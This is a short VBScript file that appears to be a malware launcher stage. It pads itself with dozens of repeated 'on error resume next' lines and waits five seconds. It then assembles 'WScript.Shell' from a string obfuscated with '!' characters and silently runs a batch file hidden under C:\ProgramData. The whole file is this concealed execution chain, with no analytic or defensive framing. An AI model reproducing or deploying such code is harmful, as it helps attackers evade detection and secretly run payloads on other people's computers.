on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
WScript.Sleep(5000)
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
Set xx1 = CreateObject(Replace("W!S!c!r!i!p!t!.!S!h!e!l!l","!",""))
xx1.Run chr(34) & "C:\ProgramData\x64\ISO\x64.bat" & Chr(34), 0